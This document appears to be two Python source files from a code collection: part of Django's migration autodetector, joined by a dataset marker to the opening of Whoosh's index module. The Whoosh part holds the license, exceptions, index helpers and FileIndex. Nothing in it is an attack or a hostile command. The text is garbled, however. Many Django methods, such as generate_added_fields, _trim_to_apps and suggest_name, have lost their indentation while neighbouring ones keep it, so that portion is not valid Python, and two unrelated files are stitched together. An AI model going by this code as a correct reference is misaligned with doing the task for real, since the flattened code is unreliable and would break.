                            related_fields[field.name] = field
                    # through will be none on M2Ms on swapped-out models;
                    # we can treat lack of through as auto_created=True, though.
                    if getattr(field.remote_field, "through", None) and not field.remote_field.through._meta.auto_created:
                        related_fields[field.name] = field
            for field in model_opts.local_many_to_many:
                if field.remote_field.model:
                    related_fields[field.name] = field
                if getattr(field.remote_field, "through", None) and not field.remote_field.through._meta.auto_created:
                    related_fields[field.name] = field
            # Are there unique/index_together to defer?
            # Note: pop() mutates model_state.options so CreateModel below
            # doesn't carry these field-referencing options.
            unique_together = model_state.options.pop('unique_together', None)
            index_together = model_state.options.pop('index_together', None)
            order_with_respect_to = model_state.options.pop('order_with_respect_to', None)
            # Depend on the deletion of any possible proxy version of us
            dependencies = [
                (app_label, model_name, None, False),
            ]
            # Depend on all bases
            for base in model_state.bases:
                if isinstance(base, six.string_types) and "." in base:
                    base_app_label, base_name = base.split(".", 1)
                    dependencies.append((base_app_label, base_name, None, True))
            # Depend on the other end of the primary key if it's a relation
            if primary_key_rel:
                dependencies.append((
                    primary_key_rel._meta.app_label,
                    primary_key_rel._meta.object_name,
                    None,
                    True
                ))
            # Generate creation operation
            self.add_operation(
                app_label,
                operations.CreateModel(
                    name=model_state.name,
                    fields=[d for d in model_state.fields if d[0] not in related_fields],
                    options=model_state.options,
                    bases=model_state.bases,
                    managers=model_state.managers,
                ),
                dependencies=dependencies,
                beginning=True,
            )
            # Don't add operations which modify the database for unmanaged models
            if not model_opts.managed:
                continue
            # Generate operations for each related field
            for name, field in sorted(related_fields.items()):
                # Account for FKs to swappable models
                swappable_setting = getattr(field, 'swappable_setting', None)
                if swappable_setting is not None:
                    dep_app_label = "__setting__"
                    dep_object_name = swappable_setting
                else:
                    dep_app_label = field.remote_field.model._meta.app_label
                    dep_object_name = field.remote_field.model._meta.object_name
                dependencies = [(dep_app_label, dep_object_name, None, True)]
                if getattr(field.remote_field, "through", None) and not field.remote_field.through._meta.auto_created:
                    dependencies.append((
                        field.remote_field.through._meta.app_label,
                        field.remote_field.through._meta.object_name,
                        None,
                        True
                    ))
                # Depend on our own model being created
                dependencies.append((app_label, model_name, None, True))
                # Make operation
                self.add_operation(
                    app_label,
                    operations.AddField(
                        model_name=model_name,
                        name=name,
                        field=field,
                    ),
                    dependencies=list(set(dependencies)),
                )
            # Generate other opns
            related_dependencies = [
                (app_label, model_name, name, True)
                for name, field in sorted(related_fields.items())
            ]
            related_dependencies.append((app_label, model_name, None, True))
            if unique_together:
                self.add_operation(
                    app_label,
                    operations.AlterUniqueTogether(
                        name=model_name,
                        unique_together=unique_together,
                    ),
                    dependencies=related_dependencies
                )
            if index_together:
                self.add_operation(
                    app_label,
                    operations.AlterIndexTogether(
                        name=model_name,
                        index_together=index_together,
                    ),
                    dependencies=related_dependencies
                )
            if order_with_respect_to:
                self.add_operation(
                    app_label,
                    operations.AlterOrderWithRespectTo(
                        name=model_name,
                        order_with_respect_to=order_with_respect_to,
                    ),
                    dependencies=[
                        (app_label, model_name, order_with_respect_to, True),
                        (app_label, model_name, None, True),
                    ]
                )
def generate_created_proxies(self):
"""
Makes CreateModel statements for proxy models.
We use the same statements as that way there's less code duplication,
but of course for proxy models we can skip all that pointless field
stuff and just chuck out an operation.
"""
added = set(self.new_proxy_keys) - set(self.old_proxy_keys)
for app_label, model_name in sorted(added):
model_state = self.to_state.models[app_label, model_name]
assert model_state.options.get("proxy")
# Depend on the deletion of any possible non-proxy version of us
dependencies = [
(app_label, model_name, None, False),
]
# Depend on all bases
for base in model_state.bases:
if isinstance(base, six.string_types) and "." in base:
base_app_label, base_name = base.split(".", 1)
dependencies.append((base_app_label, base_name, None, True))
# Generate creation operation
self.add_operation(
app_label,
operations.CreateModel(
name=model_state.name,
fields=[],
options=model_state.options,
bases=model_state.bases,
managers=model_state.managers,
),
# Depend on the deletion of any possible non-proxy version of us
dependencies=dependencies,
)
    def generate_deleted_models(self):
        """
        Find all deleted models (managed and unmanaged) and make delete
        operations for them as well as separate operations to delete any
        foreign key or M2M relationships (we'll optimize these back in later
        if we can).
        We also bring forward removal of any model options that refer to
        collections of fields - the inverse of generate_created_models().
        """
        new_keys = set(self.new_model_keys).union(self.new_unmanaged_keys)
        deleted_models = set(self.old_model_keys) - new_keys
        deleted_unmanaged_models = set(self.old_unmanaged_keys) - new_keys
        all_deleted_models = chain(sorted(deleted_models), sorted(deleted_unmanaged_models))
        for app_label, model_name in all_deleted_models:
            model_state = self.from_state.models[app_label, model_name]
            model = self.old_apps.get_model(app_label, model_name)
            if not model._meta.managed:
                # Skip here, no need to handle fields for unmanaged models
                continue
            # Gather related fields
            related_fields = {}
            for field in model._meta.local_fields:
                if field.remote_field:
                    if field.remote_field.model:
                        related_fields[field.name] = field
                    # through will be none on M2Ms on swapped-out models;
                    # we can treat lack of through as auto_created=True, though.
                    if getattr(field.remote_field, "through", None) and not field.remote_field.through._meta.auto_created:
                        related_fields[field.name] = field
            for field in model._meta.local_many_to_many:
                if field.remote_field.model:
                    related_fields[field.name] = field
                if getattr(field.remote_field, "through", None) and not field.remote_field.through._meta.auto_created:
                    related_fields[field.name] = field
            # Generate option removal first
            unique_together = model_state.options.pop('unique_together', None)
            index_together = model_state.options.pop('index_together', None)
            if unique_together:
                self.add_operation(
                    app_label,
                    operations.AlterUniqueTogether(
                        name=model_name,
                        unique_together=None,
                    )
                )
            if index_together:
                self.add_operation(
                    app_label,
                    operations.AlterIndexTogether(
                        name=model_name,
                        index_together=None,
                    )
                )
            # Then remove each related field
            for name, field in sorted(related_fields.items()):
                self.add_operation(
                    app_label,
                    operations.RemoveField(
                        model_name=model_name,
                        name=name,
                    )
                )
            # Finally, remove the model.
            # This depends on both the removal/alteration of all incoming fields
            # and the removal of all its own related fields, and if it's
            # a through model the field that references it.
            dependencies = []
            for related_object in model._meta.related_objects:
                related_object_app_label = related_object.related_model._meta.app_label
                object_name = related_object.related_model._meta.object_name
                field_name = related_object.field.name
                dependencies.append((related_object_app_label, object_name, field_name, False))
                if not related_object.many_to_many:
                    # Concrete FKs may instead be altered to point elsewhere.
                    dependencies.append((related_object_app_label, object_name, field_name, "alter"))
            for name, field in sorted(related_fields.items()):
                dependencies.append((app_label, model_name, name, False))
            # We're referenced in another field's through=
            through_user = self.through_users.get((app_label, model_state.name_lower))
            if through_user:
                dependencies.append((through_user[0], through_user[1], through_user[2], False))
            # Finally, make the operation, deduping any dependencies
            self.add_operation(
                app_label,
                operations.DeleteModel(
                    name=model_state.name,
                ),
                dependencies=list(set(dependencies)),
            )
def generate_deleted_proxies(self):
"""
Makes DeleteModel statements for proxy models.
"""
deleted = set(self.old_proxy_keys) - set(self.new_proxy_keys)
for app_label, model_name in sorted(deleted):
model_state = self.from_state.models[app_label, model_name]
assert model_state.options.get("proxy")
self.add_operation(
app_label,
operations.DeleteModel(
name=model_state.name,
),
)
    def generate_renamed_fields(self):
        """
        Works out renamed fields: an added field whose deconstruction matches
        a removed field on the same model is treated (questioner permitting)
        as a rename. Populates ``self.renamed_fields`` keyed by the new
        (app_label, model_name, field_name) with the old field name, and
        moves the key in ``self.old_field_keys`` so later phases see it kept.
        """
        self.renamed_fields = {}
        for app_label, model_name, field_name in sorted(self.new_field_keys - self.old_field_keys):
            old_model_name = self.renamed_models.get((app_label, model_name), model_name)
            old_model_state = self.from_state.models[app_label, old_model_name]
            field = self.new_apps.get_model(app_label, model_name)._meta.get_field(field_name)
            # Scan to see if this is actually a rename!
            field_dec = self.deep_deconstruct(field)
            for rem_app_label, rem_model_name, rem_field_name in sorted(self.old_field_keys - self.new_field_keys):
                if rem_app_label == app_label and rem_model_name == model_name:
                    old_field_dec = self.deep_deconstruct(old_model_state.get_field_by_name(rem_field_name))
                    # Apply model renames to the old 'to' reference so the
                    # deconstructions compare equal across a RenameModel.
                    if field.remote_field and field.remote_field.model and 'to' in old_field_dec[2]:
                        old_rel_to = old_field_dec[2]['to']
                        if old_rel_to in self.renamed_models_rel:
                            old_field_dec[2]['to'] = self.renamed_models_rel[old_rel_to]
                    if old_field_dec == field_dec:
                        if self.questioner.ask_rename(model_name, rem_field_name, field_name, field):
                            self.add_operation(
                                app_label,
                                operations.RenameField(
                                    model_name=model_name,
                                    old_name=rem_field_name,
                                    new_name=field_name,
                                )
                            )
                            self.old_field_keys.remove((rem_app_label, rem_model_name, rem_field_name))
                            self.old_field_keys.add((app_label, model_name, field_name))
                            self.renamed_fields[app_label, model_name, field_name] = rem_field_name
                            break
def generate_added_fields(self):
"""
Fields that have been added
"""
for app_label, model_name, field_name in sorted(self.new_field_keys - self.old_field_keys):
self._generate_added_field(app_label, model_name, field_name)
def _generate_added_field(self, app_label, model_name, field_name):
field = self.new_apps.get_model(app_label, model_name)._meta.get_field(field_name)
# Fields that are foreignkeys/m2ms depend on stuff
dependencies = []
if field.remote_field and field.remote_field.model:
# Account for FKs to swappable models
swappable_setting = getattr(field, 'swappable_setting', None)
if swappable_setting is not None:
dep_app_label = "__setting__"
dep_object_name = swappable_setting
else:
dep_app_label = field.remote_field.model._meta.app_label
dep_object_name = field.remote_field.model._meta.object_name
dependencies = [(dep_app_label, dep_object_name, None, True)]
if getattr(field.remote_field, "through", None) and not field.remote_field.through._meta.auto_created:
dependencies.append((
field.remote_field.through._meta.app_label,
field.remote_field.through._meta.object_name,
None,
True,
))
# You can't just add NOT NULL fields with no default or fields
# which don't allow empty strings as default.
preserve_default = True
if (not field.null and not field.has_default() and
not isinstance(field, models.ManyToManyField) and
not (field.blank and field.empty_strings_allowed)):
field = field.clone()
field.default = self.questioner.ask_not_null_addition(field_name, model_name)
preserve_default = False
self.add_operation(
app_label,
operations.AddField(
model_name=model_name,
name=field_name,
field=field,
preserve_default=preserve_default,
),
dependencies=dependencies,
)
def generate_removed_fields(self):
"""
Fields that have been removed.
"""
for app_label, model_name, field_name in sorted(self.old_field_keys - self.new_field_keys):
self._generate_removed_field(app_label, model_name, field_name)
def _generate_removed_field(self, app_label, model_name, field_name):
self.add_operation(
app_label,
operations.RemoveField(
model_name=model_name,
name=field_name,
),
# We might need to depend on the removal of an
# order_with_respect_to or index/unique_together operation;
# this is safely ignored if there isn't one
dependencies=[
(app_label, model_name, field_name, "order_wrt_unset"),
(app_label, model_name, field_name, "foo_together_change"),
],
)
    def generate_altered_fields(self):
        """
        Fields that have been altered. Compares the deconstruction of each
        kept field's old and new versions; differing concrete (or differing
        M2M) fields become AlterField, while a change between M2M and
        concrete is expressed as RemoveField + AddField since the backends
        cannot alter across that boundary.
        """
        for app_label, model_name, field_name in sorted(self.old_field_keys.intersection(self.new_field_keys)):
            # Did the field change?
            old_model_name = self.renamed_models.get((app_label, model_name), model_name)
            old_field_name = self.renamed_fields.get((app_label, model_name, field_name), field_name)
            old_field = self.old_apps.get_model(app_label, old_model_name)._meta.get_field(old_field_name)
            new_field = self.new_apps.get_model(app_label, model_name)._meta.get_field(field_name)
            # Implement any model renames on relations; these are handled by RenameModel
            # so we need to exclude them from the comparison
            if hasattr(new_field, "remote_field") and getattr(new_field.remote_field, "model", None):
                rename_key = (
                    new_field.remote_field.model._meta.app_label,
                    new_field.remote_field.model._meta.model_name,
                )
                if rename_key in self.renamed_models:
                    new_field.remote_field.model = old_field.remote_field.model
            old_field_dec = self.deep_deconstruct(old_field)
            new_field_dec = self.deep_deconstruct(new_field)
            if old_field_dec != new_field_dec:
                both_m2m = (
                    isinstance(old_field, models.ManyToManyField) and
                    isinstance(new_field, models.ManyToManyField)
                )
                neither_m2m = (
                    not isinstance(old_field, models.ManyToManyField) and
                    not isinstance(new_field, models.ManyToManyField)
                )
                if both_m2m or neither_m2m:
                    # Either both fields are m2m or neither is
                    preserve_default = True
                    # Going null -> NOT NULL without a default needs a value
                    # from the questioner to backfill existing rows.
                    if (old_field.null and not new_field.null and not new_field.has_default() and
                            not isinstance(new_field, models.ManyToManyField)):
                        field = new_field.clone()
                        new_default = self.questioner.ask_not_null_alteration(field_name, model_name)
                        if new_default is not models.NOT_PROVIDED:
                            field.default = new_default
                            preserve_default = False
                    else:
                        field = new_field
                    self.add_operation(
                        app_label,
                        operations.AlterField(
                            model_name=model_name,
                            name=field_name,
                            field=field,
                            preserve_default=preserve_default,
                        )
                    )
                else:
                    # We cannot alter between m2m and concrete fields
                    self._generate_removed_field(app_label, model_name, field_name)
                    self._generate_added_field(app_label, model_name, field_name)
def _generate_altered_foo_together(self, operation):
option_name = operation.option_name
for app_label, model_name in sorted(self.kept_model_keys):
old_model_name = self.renamed_models.get((app_label, model_name), model_name)
old_model_state = self.from_state.models[app_label, old_model_name]
new_model_state = self.to_state.models[app_label, model_name]
# We run the old version through the field renames to account for those
old_value = old_model_state.options.get(option_name) or set()
if old_value:
old_value = {
tuple(
self.renamed_fields.get((app_label, model_name, n), n)
for n in unique
)
for unique in old_value
}
new_value = new_model_state.options.get(option_name) or set()
if new_value:
new_value = set(new_value)
if old_value != new_value:
self.add_operation(
app_label,
operation(
name=model_name,
**{option_name: new_value}
)
)
    def generate_altered_unique_together(self):
        # Detect unique_together changes via the shared foo_together driver.
        self._generate_altered_foo_together(operations.AlterUniqueTogether)
    def generate_altered_index_together(self):
        # Detect index_together changes via the shared foo_together driver.
        self._generate_altered_foo_together(operations.AlterIndexTogether)
def generate_altered_db_table(self):
models_to_check = self.kept_model_keys.union(self.kept_proxy_keys).union(self.kept_unmanaged_keys)
for app_label, model_name in sorted(models_to_check):
old_model_name = self.renamed_models.get((app_label, model_name), model_name)
old_model_state = self.from_state.models[app_label, old_model_name]
new_model_state = self.to_state.models[app_label, model_name]
old_db_table_name = old_model_state.options.get('db_table')
new_db_table_name = new_model_state.options.get('db_table')
if old_db_table_name != new_db_table_name:
self.add_operation(
app_label,
operations.AlterModelTable(
name=model_name,
table=new_db_table_name,
)
)
def generate_altered_options(self):
"""
Works out if any non-schema-affecting options have changed and
makes an operation to represent them in state changes (in case Python
code in migrations needs them)
"""
models_to_check = self.kept_model_keys.union(
self.kept_proxy_keys
).union(
self.kept_unmanaged_keys
).union(
# unmanaged converted to managed
set(self.old_unmanaged_keys).intersection(self.new_model_keys)
).union(
# managed converted to unmanaged
set(self.old_model_keys).intersection(self.new_unmanaged_keys)
)
for app_label, model_name in sorted(models_to_check):
old_model_name = self.renamed_models.get((app_label, model_name), model_name)
old_model_state = self.from_state.models[app_label, old_model_name]
new_model_state = self.to_state.models[app_label, model_name]
old_options = dict(
option for option in old_model_state.options.items()
if option[0] in AlterModelOptions.ALTER_OPTION_KEYS
)
new_options = dict(
option for option in new_model_state.options.items()
if option[0] in AlterModelOptions.ALTER_OPTION_KEYS
)
if old_options != new_options:
self.add_operation(
app_label,
operations.AlterModelOptions(
name=model_name,
options=new_options,
)
)
def generate_altered_order_with_respect_to(self):
for app_label, model_name in sorted(self.kept_model_keys):
old_model_name = self.renamed_models.get((app_label, model_name), model_name)
old_model_state = self.from_state.models[app_label, old_model_name]
new_model_state = self.to_state.models[app_label, model_name]
if (old_model_state.options.get("order_with_respect_to") !=
new_model_state.options.get("order_with_respect_to")):
# Make sure it comes second if we're adding
# (removal dependency is part of RemoveField)
dependencies = []
if new_model_state.options.get("order_with_respect_to"):
dependencies.append((
app_label,
model_name,
new_model_state.options["order_with_respect_to"],
True,
))
# Actually generate the operation
self.add_operation(
app_label,
operations.AlterOrderWithRespectTo(
name=model_name,
order_with_respect_to=new_model_state.options.get('order_with_respect_to'),
),
dependencies=dependencies,
)
def generate_altered_managers(self):
for app_label, model_name in sorted(self.kept_model_keys):
old_model_name = self.renamed_models.get((app_label, model_name), model_name)
old_model_state = self.from_state.models[app_label, old_model_name]
new_model_state = self.to_state.models[app_label, model_name]
if old_model_state.managers != new_model_state.managers:
self.add_operation(
app_label,
operations.AlterModelManagers(
name=model_name,
managers=new_model_state.managers,
)
)
    def arrange_for_graph(self, changes, graph, migration_name=None):
        """
        Takes in a result from changes() and a MigrationGraph,
        and fixes the names and dependencies of the changes so they
        extend the graph from the leaf nodes for each app.

        ``migration_name``, if given, overrides the auto-suggested name
        suffix. Apps whose users decline an initial migration are dropped
        from ``changes`` and their migrations mapped to "__first__".
        """
        leaves = graph.leaf_nodes()
        name_map = {}
        for app_label, migrations in list(changes.items()):
            if not migrations:
                continue
            # Find the app label's current leaf node
            app_leaf = None
            for leaf in leaves:
                if leaf[0] == app_label:
                    app_leaf = leaf
                    break
            # Do they want an initial migration for this app?
            if app_leaf is None and not self.questioner.ask_initial(app_label):
                # They don't.
                for migration in migrations:
                    name_map[(app_label, migration.name)] = (app_label, "__first__")
                del changes[app_label]
                continue
            # Work out the next number in the sequence
            if app_leaf is None:
                next_number = 1
            else:
                next_number = (self.parse_number(app_leaf[1]) or 0) + 1
            # Name each migration
            for i, migration in enumerate(migrations):
                if i == 0 and app_leaf:
                    migration.dependencies.append(app_leaf)
                if i == 0 and not app_leaf:
                    new_name = "0001_%s" % migration_name if migration_name else "0001_initial"
                else:
                    # Suggested names are capped at 100 chars for filesystems.
                    new_name = "%04i_%s" % (
                        next_number,
                        migration_name or self.suggest_name(migration.operations)[:100],
                    )
                name_map[(app_label, migration.name)] = (app_label, new_name)
                next_number += 1
                migration.name = new_name
        # Now fix dependencies
        for app_label, migrations in changes.items():
            for migration in migrations:
                migration.dependencies = [name_map.get(d, d) for d in migration.dependencies]
        return changes
def _trim_to_apps(self, changes, app_labels):
"""
Takes changes from arrange_for_graph and set of app labels and
returns a modified set of changes which trims out as many migrations
that are not in app_labels as possible.
Note that some other migrations may still be present, as they may be
required dependencies.
"""
# Gather other app dependencies in a first pass
app_dependencies = {}
for app_label, migrations in changes.items():
for migration in migrations:
for dep_app_label, name in migration.dependencies:
app_dependencies.setdefault(app_label, set()).add(dep_app_label)
required_apps = set(app_labels)
# Keep resolving till there's no change
old_required_apps = None
while old_required_apps != required_apps:
old_required_apps = set(required_apps)
for app_label in list(required_apps):
required_apps.update(app_dependencies.get(app_label, set()))
# Remove all migrations that aren't needed
for app_label in list(changes.keys()):
if app_label not in required_apps:
del changes[app_label]
return changes
@classmethod
def suggest_name(cls, ops):
"""
Given a set of operations, suggests a name for the migration
they might represent. Names are not guaranteed to be unique,
but we put some effort in to the fallback name to avoid VCS conflicts
if we can.
"""
if len(ops) == 1:
if isinstance(ops[0], operations.CreateModel):
return ops[0].name_lower
elif isinstance(ops[0], operations.DeleteModel):
return "delete_%s" % ops[0].name_lower
elif isinstance(ops[0], operations.AddField):
return "%s_%s" % (ops[0].model_name_lower, ops[0].name_lower)
elif isinstance(ops[0], operations.RemoveField):
return "remove_%s_%s" % (ops[0].model_name_lower, ops[0].name_lower)
elif len(ops) > 1:
if all(isinstance(o, operations.CreateModel) for o in ops):
return "_".join(sorted(o.name_lower for o in ops))
return "auto_%s" % datetime.datetime.now().strftime("%Y%m%d_%H%M")
@classmethod
def parse_number(cls, name):
"""
Given a migration name, tries to extract a number from the
beginning of it. If no number found, returns None.
"""
match = re.match(r'^\d+', name)
if match:
return int(match.group())
return None | unknown | codeparrot/codeparrot-clean | ||
# Copyright 2007 Matt Chaput. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# 1. Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
#
# 2. Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY MATT CHAPUT ``AS IS'' AND ANY EXPRESS OR
# IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF
# MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO
# EVENT SHALL MATT CHAPUT OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA,
# OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
# LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
# NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE,
# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
# The views and conclusions contained in the software and documentation are
# those of the authors and should not be interpreted as representing official
# policies, either expressed or implied, of Matt Chaput.
"""Contains the main functions/classes for creating, maintaining, and using
an index.
"""
from __future__ import division
import os.path, re, sys
from time import time, sleep
from whoosh import __version__
from whoosh.legacy import toc_loaders
from whoosh.compat import pickle, string_type
from whoosh.fields import ensure_schema
from whoosh.system import _INT_SIZE, _FLOAT_SIZE, _LONG_SIZE
# Name used when the caller doesn't specify an index name explicitly.
_DEF_INDEX_NAME = "MAIN"
# Version number of the on-disk TOC format written by this code
# (see TOC.read/TOC.write below).
_CURRENT_TOC_VERSION = -111
# Exceptions
class LockError(Exception):
    """Generic error for index locking problems (see FileIndex.lock)."""
    pass
class IndexError(Exception):
    """Generic index error.

    NOTE(review): this class shadows the builtin ``IndexError`` inside this
    module; refer to it as ``whoosh.index.IndexError`` from other modules
    to avoid confusion.
    """
class IndexVersionError(IndexError):
    """Signals that the on-disk index uses a format this version of Whoosh
    cannot read -- that is, the index is neither backward nor forward
    compatible with the running code.

    :ivar version: the unreadable on-disk format version.
    :ivar release: the Whoosh release that wrote the index, if known.
    """

    def __init__(self, msg, version, release=None):
        super(IndexVersionError, self).__init__(msg)
        self.version = version
        self.release = release
class OutOfDateError(IndexError):
    """Raised when you try to commit changes to an index which is not the
    latest generation. See Index.up_to_date().
    """
class EmptyIndexError(IndexError):
    """Raised when you try to work with an index that has no indexed terms.
    Raised by TOC.read when no TOC file exists for the index.
    """
# Convenience functions
def create_in(dirname, schema, indexname=None):
    """Convenience function to create an index in a directory, creating the
    FileStorage object for you.

    :param dirname: the path string of the directory in which to create the
        index.
    :param schema: a :class:`whoosh.fields.Schema` object describing the
        index's fields.
    :param indexname: the name of the index to create; you only need to
        specify this if you are creating multiple indexes within the same
        storage object.
    :returns: :class:`Index`
    """
    from whoosh.filedb.filestore import FileStorage

    storage = FileStorage(dirname)
    return FileIndex.create(storage, schema, indexname or _DEF_INDEX_NAME)
def open_dir(dirname, indexname=None, readonly=False, schema=None):
    """Convenience function for opening an index in a directory, creating
    the FileStorage object for you. ``dirname`` is the directory containing
    the index; ``indexname`` only needs to be given when the storage holds
    multiple indexes.

    :param dirname: the path string of the directory containing the index.
    :param indexname: the name of the index to open; you only need to
        specify this if you have multiple indexes within the same storage
        object.
    """
    from whoosh.filedb.filestore import FileStorage

    if indexname is None:
        indexname = _DEF_INDEX_NAME
    return FileIndex(FileStorage(dirname, readonly=readonly),
                     schema=schema, indexname=indexname)
def exists_in(dirname, indexname=None):
    """Returns True if dirname contains a Whoosh index.

    :param dirname: the file path of a directory.
    :param indexname: the name of the index. If None, the default index
        name is used.
    """
    if not os.path.exists(dirname):
        return False
    try:
        ix = open_dir(dirname, indexname=indexname)
        return ix.latest_generation() > -1
    except EmptyIndexError:
        # The directory exists but holds no (readable) index.
        return False
def exists(storage, indexname=None):
    """Deprecated; use ``storage.index_exists()``.

    :param storage: a store.Storage object.
    :param indexname: the name of the index. If None, the default index name is
        used.
    :returns: True if the storage contains the named index.
    """
    return storage.index_exists(indexname)
def version_in(dirname, indexname=None):
    """Returns a tuple of (release_version, format_version) for the index in
    the given directory, where release_version is the version of the Whoosh
    code that created the index -- e.g. ``(0, 1, 24)`` -- and format_version
    is the version number of the on-disk TOC format -- e.g. ``-102``.

    Avoid attaching significance to the second number: it is an internal
    version for the TOC file and probably should not have been exposed in a
    public interface. The reliable way to check whether this version of
    Whoosh can open an index is simply to try to open it and catch
    ``whoosh.index.IndexVersionError``.

    Both values are also available as ``Index.release`` and ``Index.version``
    on an open index.

    :param dirname: the file path of a directory containing an index.
    :param indexname: the name of the index. If None, the default index name
        is used.
    :returns: ((major_ver, minor_ver, build_ver), format_ver)
    """
    from whoosh.filedb.filestore import FileStorage

    return version(FileStorage(dirname), indexname=indexname)
def version(storage, indexname=None):
    """Returns a tuple of (release_version, format_version) for the named
    index in the given storage object, where release_version is the version
    of the Whoosh code that created the index -- e.g. ``(0, 1, 24)`` -- and
    format_version is the version number of the on-disk TOC format -- e.g.
    ``-102``.

    Avoid attaching significance to the second number: it is an internal
    version for the TOC file. The reliable way to check whether this
    version of Whoosh can open an index is simply to try to open it and
    catch ``whoosh.index.IndexVersionError``.

    Both values are also available as ``Index.release`` and
    ``Index.version`` on an open index.

    :param storage: a store.Storage object.
    :param indexname: the name of the index. If None, the default index
        name is used.
    :returns: ((major_ver, minor_ver, build_ver), format_ver)
    """
    if indexname is None:
        indexname = _DEF_INDEX_NAME
    try:
        ix = storage.open_index(indexname)
        return (ix.release, ix.version)
    except IndexVersionError:
        # The index is unreadable, but the error carries the format version.
        e = sys.exc_info()[1]
        return (None, e.version)
# Index base class
class Index(object):
    """Represents an indexed collection of documents.
    """

    def close(self):
        """Closes any open resources held by the Index object itself. Note
        that this may not close resources in use elsewhere, for example by
        a Searcher object.
        """

    def add_field(self, fieldname, fieldspec):
        """Adds a field to the index's schema.

        :param fieldname: the name of the field to add.
        :param fieldspec: an instantiated :class:`whoosh.fields.FieldType`
            object.
        """
        writer = self.writer()
        writer.add_field(fieldname, fieldspec)
        writer.commit()

    def remove_field(self, fieldname):
        """Removes the named field from the index's schema. Depending on
        the backend implementation this may or may not actually remove
        existing data for the field; optimizing the index should always
        clear out existing data for a removed field.
        """
        writer = self.writer()
        writer.remove_field(fieldname)
        writer.commit()

    def latest_generation(self):
        """Returns the generation number of the latest generation of this
        index, or -1 if the backend doesn't support versioning.
        """
        return -1

    def refresh(self):
        """Returns a new Index object representing the latest generation
        of this index (or self, when this object already is the latest
        generation or the backend doesn't support versioning).

        :returns: :class:`Index`
        """
        return self

    def up_to_date(self):
        """Returns True if this object represents the latest generation of
        this index; False if someone else has updated the index since this
        object was opened.
        """
        return True

    def last_modified(self):
        """Returns the last modified time of the index, or -1 if the
        backend doesn't support last-modified times.
        """
        return -1

    def is_empty(self):
        """Returns True if this index is empty (that is, it has never had
        any documents successfully written to it).
        """
        raise NotImplementedError

    def optimize(self):
        """Optimizes this index, if necessary.
        """

    def _read_stat(self, methodname, *args):
        # Open a reader, call the named method on it, and always close the
        # reader afterwards.
        ixreader = self.reader()
        try:
            return getattr(ixreader, methodname)(*args)
        finally:
            ixreader.close()

    def doc_count_all(self):
        """Returns the total number of documents, DELETED OR UNDELETED, in
        this index.
        """
        return self._read_stat("doc_count_all")

    def doc_count(self):
        """Returns the total number of UNDELETED documents in this index.
        """
        return self._read_stat("doc_count")

    def searcher(self, **kwargs):
        """Returns a Searcher object for this index. Keyword arguments are
        passed to the Searcher object's constructor.

        :rtype: :class:`whoosh.searching.Searcher`
        """
        from whoosh.searching import Searcher

        return Searcher(self.reader(), fromindex=self, **kwargs)

    def field_length(self, fieldname):
        """Returns the total length of the given field across all
        documents.
        """
        return self._read_stat("field_length", fieldname)

    def max_field_length(self, fieldname):
        """Returns the maximum length of the given field across all
        documents.
        """
        return self._read_stat("max_field_length", fieldname)

    def reader(self, reuse=None):
        """Returns an IndexReader object for this index.

        :param reuse: an existing reader. Some implementations may recycle
            resources from this existing reader to create the new reader.
            Note that any resources in the "recycled" reader that are not
            used by the new reader will be CLOSED, so you CANNOT use it
            afterward.
        :rtype: :class:`whoosh.reading.IndexReader`
        """
        raise NotImplementedError

    def writer(self, **kwargs):
        """Returns an IndexWriter object for this index.

        :rtype: :class:`whoosh.writing.IndexWriter`
        """
        raise NotImplementedError

    def delete_by_term(self, fieldname, text, searcher=None):
        # Convenience: delete documents matching the term through a
        # short-lived writer.
        writer = self.writer()
        writer.delete_by_term(fieldname, text, searcher=searcher)
        writer.commit()

    def delete_by_query(self, q, searcher=None):
        # Convenience: delete documents matching the query through a
        # short-lived writer.
        writer = self.writer()
        writer.delete_by_query(q, searcher=searcher)
        writer.commit()
# Codec-based index implementation
def clean_files(storage, indexname, gen, segments):
    # Attempts to remove index files that are no longer referenced (called
    # when a new generation is created). If existing Index and/or reader
    # objects still have the files open they may not be deletable right
    # away (e.g. on Windows), but they will usually be removed by a later
    # call to clean_files.
    live_segments = set(seg.segment_id() for seg in segments)
    toc_re = TOC._pattern(indexname)
    seg_re = TOC._segment_pattern(indexname)

    doomed = set()
    for filename in storage:
        if filename.startswith("."):
            continue
        toc_match = toc_re.match(filename)
        if toc_match:
            # TOC files from generations other than the current one
            if int(toc_match.group(1)) != gen:
                doomed.add(filename)
            continue
        seg_match = seg_re.match(filename)
        if seg_match and seg_match.group(1) not in live_segments:
            # Segment files no live segment refers to
            doomed.add(filename)

    for filename in doomed:
        try:
            storage.delete_file(filename)
        except OSError:
            # Another process apparently still has this file open
            pass
class FileIndex(Index):
    """Index implementation backed by a file storage object (see
    ``whoosh.filedb.filestore``), using a generation-numbered TOC file to
    record the index's schema and segments after each commit.
    """
    def __init__(self, storage, schema=None, indexname=_DEF_INDEX_NAME):
        from whoosh.filedb.filestore import Storage
        if not isinstance(storage, Storage):
            raise ValueError("%r is not a Storage object" % storage)
        if not isinstance(indexname, string_type):
            raise ValueError("indexname %r is not a string" % indexname)
        if schema:
            schema = ensure_schema(schema)
        self.storage = storage
        # A schema passed here overrides the pickled schema in the TOC file
        # (see TOC.read); None means "use the saved schema".
        self._schema = schema
        self.indexname = indexname
        # Try reading the TOC to see if it's possible
        TOC.read(self.storage, self.indexname, schema=self._schema)
    @classmethod
    def create(cls, storage, schema, indexname=_DEF_INDEX_NAME):
